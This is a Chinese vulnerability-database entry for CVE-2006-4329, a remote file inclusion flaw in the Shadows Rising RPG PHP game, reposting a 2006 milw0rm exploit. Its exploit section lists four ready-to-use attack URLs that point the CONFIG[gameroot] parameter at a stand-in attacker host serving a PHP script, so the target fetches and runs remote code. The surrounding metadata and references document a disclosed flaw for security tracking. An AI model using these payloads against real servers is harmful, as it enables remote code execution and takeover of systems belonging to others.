Shadows Rising RPG多个远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110862 漏洞类型 输入验证
发布时间 2006-08-20 更新时间 2006-08-26
CVE编号 CVE-2006-4329 CNNVD-ID CNNVD-200608-388
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/2229
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200608-388
|漏洞详情
ShadowsRisingRPG(Pre-Alpha)0.0.5b及早期版本中存在多个PHP远程文件包含漏洞,远程攻击者可借助提交到以下脚本的CONFIG[gameroot]参数中的URL执行任意PHP代码:(1)core/includes/security.inc.php,(2)core/includes/smarty.inc.php,(3)qcms/includes/smarty.inc.php或(4)qlib/smarty.inc.php脚本。
|漏洞EXP
/*
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
-   - - [DEVIL TEAM THE BEST POLISH TEAM] - -
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
- Shadows Rising RPG (Pre-Alpha) <= 0.0.5b (CONFIG[gameroot]) Remote File Include Vulnerability
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
- [Script name: Shadows Rising RPG (Pre-Alpha) v. 0.0.5b
- [Script site: http://sourceforge.net/projects/shadowsrising/
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
-          Find by: Kacper (a.k.a Rahim)
+
-          Contact: kacper1964@yahoo.pl
-                        or
-          http://www.devilteam.yum.pl/
-                       and
-           http://www.rahim.webd.pl/
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
- Special Greetz: DragonHeart ;-)
- Ema: Leito, Adam, DeathSpeed, Drzewko, pepi
-
!@ Przyjazni nie da sie zamienic na marne korzysci @!
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
-            Z Dedykacja dla osoby,
-         bez ktorej nie mogl bym zyc...
-           K.C:* J.M (a.k.a Magaja)
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
*/
/*

Shadows Rising RPG <- GAME OVER :D

*/
#Exploit:

http://www.site.com/[ShadowsRising_path]/core/includes/security.inc.php?CONFIG[gameroot]=[http://www.myevilsite.com/evil_scripts.txt]
http://www.site.com/[ShadowsRising_path]/core/includes/smarty.inc.php?CONFIG[gameroot]=[http://www.myevilsite.com/evil_scripts.txt]
http://www.site.com/[ShadowsRising_path]/qcms/includes/smarty.inc.php?CONFIG[gameroot]=[http://www.myevilsite.com/evil_scripts.txt]
http://www.site.com/[ShadowsRising_path]/qlib/smarty.inc.php?CONFIG[gameroot]=[http://www.myevilsite.com/evil_scripts.txt]

# milw0rm.com [2006-08-20]
|参考资料

来源:XF
名称:shadowsrising-configgameroot-file-include(28478)
链接:http://xforce.iss.net/xforce/xfdb/28478
来源:BID
名称:19608
链接:http://www.securityfocus.com/bid/19608
来源:MILW0RM
名称:2229
链接:http://www.milw0rm.com/exploits/2229
来源:VIM
名称:20060823sourceVERIFYofShadowsRisingRPGfileinclude
链接:http://www.attrition.org/pipermail/vim/2006-August/000986.html
来源:OSVDB
名称:28283
链接:http://www.osvdb.org/28283
来源:OSVDB
名称:28282
链接:http://www.osvdb.org/28282
来源:MILW0RM
名称:2229
链接:http://milw0rm.com/exploits/2229